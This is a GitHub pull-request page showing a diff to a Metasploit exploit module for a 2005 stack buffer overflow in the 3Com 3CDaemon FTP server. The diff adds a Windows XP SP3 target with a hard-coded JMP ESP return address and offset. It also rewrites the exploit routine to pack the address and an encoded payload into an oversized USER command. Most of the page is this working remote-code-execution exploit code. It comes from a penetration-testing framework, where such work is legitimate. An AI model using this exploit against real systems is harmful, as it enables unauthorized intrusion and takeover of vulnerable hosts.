Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

Add Windows SP3 to targets for 3cdaemon FTP #268

Merged
merged 1 commit into from

2 participants

otr sinn3r
otr

Using jmp esp instead of seh for sp3

sinn3r wchen-r7 merged commit 30a3d8b into from
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Mar 23, 2012
  1. otr

    Add Windows SP3 to targets.

    olliwolli authored
This page is out of date. Refresh to see the latest.
Showing with 34 additions and 7 deletions.
  1. +34 −7 modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
41 modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
View
@@ -5,8 +5,8 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
##
require 'msf/core'
@@ -26,7 +26,11 @@ def initialize(info = {})
web site and is recommended in numerous support documents.
This module uses the USER command to trigger the overflow.
},
- 'Author' => [ 'hdm' ],
+ 'Author' =>
+ [
+ 'hdm', # Original author
+ 'otr' # Windows XP SP3
+ ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@@ -37,6 +41,11 @@ def initialize(info = {})
[ 'BID', '12155'],
[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'seh',
+ 'target' => 0
+ },
'Privileged' => false,
'Payload' =>
{
@@ -55,6 +64,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x75022ac4, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -62,6 +72,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x71aa32ad, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -69,6 +80,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x77681799, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -76,9 +88,18 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x775F29D0,
+ 'Offset' => 229,
+ },
+ ],
+ [
+ 'Windows XP English SP3',
+ {
+ 'Platform' => 'win',
+ 'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
+ #'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
+ 'Offset' => 245,
},
],
-
],
'DisclosureDate' => 'Jan 4 2005'))
end
@@ -97,9 +118,15 @@ def exploit
print_status("Trying target #{target.name}...")
- buf = rand_text_english(2048, payload_badchars)
- seh = generate_seh_payload(target.ret)
- buf[229, seh.length] = seh
+ if (target == targets[4])
+ buf = rand_text_english(target['Offset'], payload_badchars)
+ buf << [ target['Ret'] ].pack('V') * 2
+ buf << payload.encoded
+ else
+ buf = rand_text_english(2048, payload_badchars)
+ seh = generate_seh_payload(target.ret)
+ buf[target['Offset'], seh.length] = seh
+ end
send_cmd( ['USER', buf] , false )
Something went wrong with that request. Please try again.